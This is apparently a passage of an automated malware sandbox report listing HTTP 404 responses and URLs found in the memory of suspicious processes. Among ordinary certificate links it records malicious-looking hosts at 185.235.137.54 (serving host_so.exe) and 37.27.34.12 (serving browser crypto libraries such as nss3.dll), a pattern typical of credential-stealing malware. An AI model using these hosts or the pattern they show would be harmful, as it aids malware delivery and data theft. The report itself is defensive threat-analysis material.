Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:26:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:27:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/
Source: 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/N
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788178535.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760479416.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788207349.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1772605179.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2087586724.0000000000863000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152636525.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.1403647144.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.1401095167.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000000.2053146567.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, katDDA4.tmp.11.dr	String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.1402569420.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1402546303.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1400425752.0000000002C80000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 00000002.00000000.1403647144.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: katDDA4.tmp, 0000000C.00000002.2545656543.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.12.dr	String found in binary or memory: https://37.27.34.12
Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000960000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000960000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000976000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/=
Source: katDDA4.tmp, 0000000C.00000003.2144632677.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/W
Source: katDDA4.tmp, 0000000C.00000003.2114692645.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/f
Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dll0u
Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dllBu
Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/freebl3.dllxu_
Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/m
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/mozglue.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/mozglue.dlleub
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/msvcp140.dll
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/msvcp140.dll/
Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/msvcp140.dlly
Source: katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/nss3.dll
Source: katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/nss3.dllP
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://37.27.34.12/p
